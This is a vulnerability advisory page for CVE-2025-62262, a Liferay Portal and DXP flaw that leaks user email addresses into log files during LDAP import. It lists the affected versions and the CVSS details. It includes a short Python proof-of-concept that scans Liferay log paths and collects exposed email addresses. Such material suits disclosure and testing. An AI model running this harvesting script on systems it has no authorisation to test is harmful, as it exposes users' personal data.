Security Vulnerability Report
CVE-2025-62262 CVSS 4.4 MEDIUM

CVE-2025-62262

Published: 2025-10-27 21:15:38
Last Modified: 2025-11-10 22:03:59

Description

Information exposure through log file vulnerability in LDAP import feature in Liferay Portal 7.4.0 through 7.4.3.97, and older unsupported versions, and Liferay DXP 2023.Q3.1 through 2023.Q3.4, 7.4 GA through update 92, 7.3 GA through update 35, and older unsupported versions allows local users to view user email address in the log files.

CVSS Details

CVSS Score: 4.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:liferay:digital_experience_platform:7.3:service_pack_3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:7.3:update1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:7.3:update10:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:7.3:update11:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:7.3:update12:*:*:*:*:*:* - VULNERABLE
Liferay Portal 7.4.0 through 7.4.3.97
Liferay Portal older unsupported versions
Liferay DXP 2023.Q3.1 through 2023.Q3.4
Liferay DXP 7.4 GA through update 92
Liferay DXP 7.3 GA through update 35
Liferay DXP older unsupported versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62262 PoC - Liferay LDAP Import Information Disclosure
# This PoC demonstrates how user email addresses may be exposed in log files
import os
import re


def check_liferay_logs(log_paths):
    """
    Check Liferay log files for exposed email addresses during LDAP import.

    Common log locations:
    - /opt/liferay/logs/liferay.log
    - /var/log/liferay/catalina.out
    - $LIFERAY_HOME/logs/liferay.[date].log
    """
    email_pattern = r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}'
    # Look for LDAP import related log entries with email addresses.
    # The keyword group is non-capturing and the address is captured, so
    # findall() returns the email addresses rather than the matched keyword.
    ldap_import_pattern = re.compile(
        r'(?:LDAP|import|sync).*?(' + email_pattern + r')',
        re.IGNORECASE,
    )
    exposed_emails = set()

    for log_path in log_paths:
        if os.path.exists(log_path):
            with open(log_path, 'r', encoding='utf-8', errors='ignore') as f:
                # Scan line by line so large log files are not read into memory at once
                for line in f:
                    exposed_emails.update(ldap_import_pattern.findall(line))

    # Return unique addresses in a stable order
    return sorted(exposed_emails)


# Example usage
if __name__ == "__main__":
    log_locations = [
        "/opt/liferay/logs/liferay.log",
        "/var/log/liferay.log",
        "C:\\liferay\\logs\\liferay.log"
    ]

    print("Scanning for exposed emails in Liferay logs...")
    emails = check_liferay_logs(log_locations)

    if emails:
        print(f"Found {len(emails)} potentially exposed email addresses:")
        for email in emails:
            print(f" - {email}")
    else:
        print("No exposed emails found in scanned log files.")

References

Raw JSON Data
